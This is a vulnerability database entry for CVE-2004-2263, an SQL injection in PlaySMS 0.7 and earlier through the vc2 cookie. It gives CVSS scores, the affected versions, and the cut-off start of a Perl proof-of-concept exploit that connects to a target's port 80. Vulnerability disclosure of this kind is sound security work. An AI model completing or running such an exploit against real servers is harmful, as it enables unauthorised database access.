7.5
CVSSv2

CVE-2004-2263

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the valid function in fr_left.php in PlaySMS 0.7 and previous versions allows remote malicious users to modify SQL statements via the vc2 cookie.

Vulnerable Product Search on Vulmon Subscribe to Product

playsms playsms 0.6

playsms playsms 0.7

Exploits

#!/usr/bin/perl # PlaySMS version 07 and prior SQL Injection PoC # Written by Noam Rathaus of Beyond Security Ltd # use IO::Socket; use strict; my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "cannot connect to http daemon on $host" } ...